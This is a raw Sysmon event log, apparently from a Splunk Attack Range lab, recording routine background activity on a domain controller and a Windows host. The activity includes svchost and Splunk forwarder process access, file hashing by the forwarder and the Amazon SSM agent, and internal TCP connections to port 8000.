10:49:53.288{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:53.288{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:53.288{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1600-000000003802}1208C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287592Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:54.976{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8A31C743D1273635078BD17EEFB9CD0,SHA256=7A13C9AF6A96C9AC4DE7B012BD5782BC46BC2745604A1DDF15A4FA85DFE215BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216538Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:54.440{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43F1FA92EF735FCB97970E26488DF0BC,SHA256=3B3A19299DBAD9C507700DB6854B167695AE4938A5C064ED36914800A979E463,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:55.992{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4443658FFF3123717179EBD4411CB4C3,SHA256=38A200816CEB4458222F07696D5B883E8D8BB684CA753BE8D458DA043D1526F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216539Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:55.659{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0C844B29C097ECDE5FEEC0BEA45F78,SHA256=D4575B6C4257A22867950780B860CD89B81397EDE48DF401FEF3733BE2C85B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216541Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:56.742{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-133MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216540Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:56.661{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4134BE5377FFB32012AFCEB99A1FA6A0,SHA256=A1B4AFF246EA6CA99248BB07BAD7B1DDFFBCADB3D270FF63474E1E2F331D4D3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216544Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:57.745{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=267793437137F00C6E3B1FC2827996FC,SHA256=22ECC8074F0A022198D201E74074CCAF2F3CA13FAFA8B50FB0ECAAC759663DA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:57.007{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89DAC5FE8A08D449E7E358299F8B2149,SHA256=DB30B410E0E1C48ACFE8D9673E7F85D76484D390980ED7E32F2C840B52454967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216543Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:57.741{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-134MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216542Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:54.632{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51331-false10.0.1.12-8000- 23542300x8000000000000000216545Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:58.754{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B3D1024015FB826CF730B8682AAE830,SHA256=BAA075D8B4776B888AB4F9FE373C1FC4F1606DC30B1F70D0D741BEC7B07CDD77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:58.038{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34E39DFD13CDF3433A71E14838D620B0,SHA256=D9EA1E3009A7E52AEBEA28FD9CC8521562080E6D29A6F8373903FE84447445B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216546Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:49:59.848{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1360680C4A5F1EF0060B58A266E093E5,SHA256=9858B013AD0532687B6EE4BE83C23D4ED64E4DACC94FCFAC4322215B08BCC131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:59.054{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FAAA5440125BA81889F2AE5340293D2,SHA256=2063AF67E793222170428822CACAC78211A75BF2B6D21A54642C9A6660DB388B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216547Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:00.864{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0D8E8D9411001FE71A48500EA55CA22,SHA256=DFE79CA442BD82CD8FD7576D68FB116813CBDF24617250BC7AFF42F740931E08,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:49:57.528{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53430-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:00.054{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3F423792025890A8B0E1909137A44A8,SHA256=57406912B7051A42C62DAACA79DA957B68814C04574D3D422AE67D42415EF0EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.839{C8EA50B7-1159-6216-0505-000000003802}29564328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.491{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1159-6216-0505-000000003802}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.491{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.491{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.491{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1159-6216-0505-000000003802}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.491{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.491{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.491{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1159-6216-0505-000000003802}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.493{C8EA50B7-1159-6216-0505-000000003802}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:01.132{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC1865DC4AF589FBD21B69D1B01B6342,SHA256=E26DACA0BBE3915E3292F175E6BDE9BCBAE460D33E3414770C52B8907A26CE09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.148{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7F1EEE5E8FEA469A20676E53E4EEDBA,SHA256=CDB803DCD9D46DDB13EA9A7A0F1029364405DDB289C8D47799B51756B2146EFD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216549Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:00.555{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51332-false10.0.1.12-8000- 23542300x8000000000000000216548Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:50:02.083{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00001144CFD751A5716AEC3909CD528E,SHA256=7E40AAA2F54B44AB56271EA0C08EF73CDF305BEC6ABBD3211B7257A81E51AAD0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.101{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-115A-6216-0605-000000003802}2448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287615Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.101{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287614Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.101{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287613Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:50:02.101{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 